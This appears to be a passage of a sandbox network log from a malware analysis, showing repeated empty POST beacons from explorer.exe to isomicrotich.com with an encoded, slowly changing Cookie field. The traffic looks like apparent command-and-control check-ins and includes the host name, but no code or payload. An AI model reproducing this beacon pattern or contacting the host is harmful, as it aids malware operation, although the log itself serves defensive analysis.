                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6nWiiugKRW%2ByIPNj8Mw1GoZeWhjjcdOZP9g47SBsweQ6BrlhKQh84lbIGaQO43Qho4TyzNzVaoYSVTFdbyoe2J386SL%2FWxjyFqZydc4WyJnXfeEW4NxVLMfEmWHtdpqy8Ak"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1886af095e86-EWR
2024-10-03 18:46:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 62272 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:36 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:37 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JR9UwX9nKp3oJWx7UE3UA49gQoUbO0gVTrYvf4M93kLyaSfVh%2FAFG8usqueupKwgtMU9xBwqw8JFH94fVGJN70YcLRXYSnX8FHddZhxGPGtoHZAHzxaDi85v%2FT06sztvECWP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf189039d642f4-EWR
2024-10-03 18:46:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 62273 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:37 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:38 UTC | 542 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ksba29Y1WI9Qs6E1Ph%2FDQQeTP97r2Q6ZBPWfs0ZFbxOEUxKuk%2Bg7XqEY1paa7F2OEXkM5pk3JPSRlSC8wIP90fvlzyZHkOVk5bUWfuv3vOluOkUSbffaigjtt4zjP7fK%2Bodq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1896d89441de-EWR
2024-10-03 18:46:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 62274 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:38 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:39 UTC | 552 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:39 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9G4Amcr%2B2kkRkSb3etZ0OkzSFK6Bd%2FL0szNUlJJukiyv5hZdXj8lUN6RpXGbtqcJK19YpI9ov%2FosB29mcbFvG%2BUHgfJwbaEVziGure%2B3%2BO7x6WNA7lEZuLZ%2Feh4%2BJRzLA7fx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf189d8a620f5d-EWR
2024-10-03 18:46:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 62276 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:39 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:40 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QieRimS9lbQZbBGBLoTXqVyeOLnlTjjf6Rb6kY7kC%2BcIXbgESiboLiDWtLibC8lqBpTmRRzZNDYtmGCrk%2FjbwdU9EwejrgK2t5rZXj4Rc%2FP4SuwPf0kguq9rDlX3eDDDMGHh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18a489137c8a-EWR
2024-10-03 18:46:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 62278 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:41 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:41 UTC | 556 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:41 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSxGgNqX8kxHuQcHBiUhn%2B%2FDmu%2F7I1oXG%2BA3U5JmucJx%2FCfnqjBVsb5E%2B7%2Fm5G3eMQ%2F3YawXin8ayGnx43imIJYth1V65N%2FBw2BxeYIeoo6Gn7t%2FqizX866R9elC10EjjUCF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18ab29f6433f-EWR
2024-10-03 18:46:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 62279 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:42 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:42 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:42 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzjvHNPlffFWJL7vs%2BAuAIaAHqAGKTJfT2GpaV67Uvt9DBrWd1vfUE3eAd13NvFKGfMWjveoHvdrRK9MKBvmZxTSR5jahJmI9VZ81gjEhXd5H%2Fr%2BTtBzTeUNAqujY8q%2BpIeL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18b46ec243e9-EWR
2024-10-03 18:46:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 62282 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:43 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:44 UTC  542                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4E4d%2BilSVx8wFFKBVpITag2RLmNvQrgF8G9ZIrvF2OGeKARobIrM0QzZgZaN%2FrPBGFVU9Augjc%2B3h9IdvTcR6qSWhUbxtFUa4vWi6GWJ5IkWLN99ZHCSeSGgCC4PywmskZS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18baed7c8cba-EWR
2024-10-03 18:46:44 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.7  62284        188.114.97.3    443               4056  C:\Windows\explorer.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-03 18:46:45 UTC  421                OUT        POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:45 UTC  569                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:45 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMhGiMHIzDyech5ItS5JxMbG3RuyyVhrqUN%2FzoY7WwufzZUR3jyWjXq%2BVorBFy0maQ4c9BNfL%2B6nuFjijcAJn0glcXnYauopq5IKQ98WXu8Onivk6DUNqzWWQOv13x%2F%2BMKee"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18c43fde4257-EWR
2024-10-03 18:46:45 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.7  62286        188.114.97.3    443               4056  C:\Windows\explorer.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-03 18:46:46 UTC  421                OUT        POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:47 UTC  563                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wqxQC3SB13x3%2B%2BXOmnB03PzMKvRGUc6UZ1My7SaTSMFoCEeQXke8IrJSqbKD2TpCtmCf5q2faWYxfGEHSjBNorpADFhVEmWxhcsL7hrdrqGQOKBaeQfSRld2UhbXw5ZhIge2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18ccdb477ce2-EWR
2024-10-03 18:46:47 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.7  62289        188.114.97.3    443               4056  C:\Windows\explorer.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-03 18:46:47 UTC  421                OUT        POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFg6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:48 UTC  569                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:48 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emK9rVHaVqouZA1WR13kNKIuyHUq%2BJD%2Bn2L6p5URF50KlAgPSxq5%2F%2BAhiEQbUK%2BngzqdZQBZzxX15Iw2tX48N6s9Gr3YiaKzZsp9xesFdIHTJxbTlKFzL1K2vhGrXOiPwoyE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18d558771875-EWR
2024-10-03 18:46:48 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.7  62290        188.114.97.3    443               4056  C:\Windows\explorer.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-03 18:46:48 UTC  421                OUT        POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:49 UTC  546                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:49 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bs06lZZK6kJzoKFZ2KrN8ikWlZvAvdIc7cH2ybTO16ajdmtdvwNL98cFe9st4ba1pV4HLsjUVHGw128L%2Bhh2DzQzvVtlGNMfc1ZVcjFd3Fi%2FppCT6Jb%2BbGVQJJB3k63JTFs%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18dbe94578db-EWR
2024-10-03 18:46:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 62291 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:49 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:50 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4kb6TaY7SiuTTJct9riXpaM8%2BJTYOqpQ6yWU2jaZV7s7%2FyFvVZbjMHyP4eE%2BGYUQAcCRGt5VXJn1yjmtVaTRxJPHpk2xbVDrCfhxHEaq9iUYEnn9XOKeAJ5pdsYJyOM%2Bfvt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18e25919434f-EWR
2024-10-03 18:46:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 62293 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:51 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:52 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:52 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvBuZXOVCAPxWVOxS%2BXi7MEu24k4h6K17mwZeyKiK%2FDj7RgkRdZWaMzzSq%2Bakq1xOS9La6ROBrgfYkJKh%2BSABH8FPIC5XIj7oz01LL9auGC5Kf3siXxuyiOTgsYzdWv6JZ7P"}],"group":"cf-nel","max_age":604800}
